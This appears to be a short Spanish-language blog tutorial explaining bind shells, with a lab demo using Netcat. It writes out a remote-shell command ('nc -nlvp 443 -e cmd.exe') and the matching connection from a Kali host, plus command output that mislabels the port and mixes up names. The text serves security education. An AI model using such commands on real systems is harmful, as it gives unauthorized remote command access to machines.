¿Que es Bind Shell?

el


Un Bind Shell es como una configuración donde las consolas remotas se establecen con otras computadoras a través de la red. En Bind shell, un atacante lanza un servicio (como Netcat) en la computadora de destino, a la que el atacante puede conectarse. En un shell de enlace, un atacante puede conectarse a la computadora de destino y ejecutar comandos en la computadora de destino.

Para iniciar un shell de enlace, el atacante debe tener la dirección IP de la víctima para acceder a la computadora de destino.

¿Que es un sell?

Un shell es un software que actúa como intermediario entre el usuario y el kernel. Proporciona al usuario una interfaz que proporciona acceso a los servicios del kernel. Por ejemplo: Bash Shell, etc.

Bob verificará su dirección IP local, luego ejecutará Netcat con la opción -e para ejecutar cmd.exe una vez que se establezca una conexión con el puerto de escucha.

C:\Users\Pepe> ipconfig 

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :

IPv4 Address. . . . . . . . . . . : 10.11.0.22

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . : 10.11.0.1


C:\Users\Pepe> nc -nlvp 443 -e cmd.exe 

listening on [any] 4444 ...


Ahora Netcat ha vinculado el puerto TCP 443 a cmd.exe y redirigirá cualquier entrada, salida o mensaje de error de cmd.exe a la red. En otras palabras, cualquier persona que se conecte al puerto TCP 443 en la máquina de Pepe (con suerte, Alicia) verá el símbolo del sistema de Pepe

kali@kali:~$ ip address show eth0 | grep inetinet 

10.11.0.4/16  brd 10.11.255.255  scope global dynamic eth0

kali@kali:~$ nc -nv 10.11.0.22 443

(UNKNOWN) [10.11.0.22] 443 (?) open

Microsoft Windows [Version 10.0.17134.590]

(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Pepe> ipconfig 

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :

IPv4 Address. . . . . . . . . . . : 10.11.0.22

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . : 10.11.0.1











Comentarios

Publicar un comentario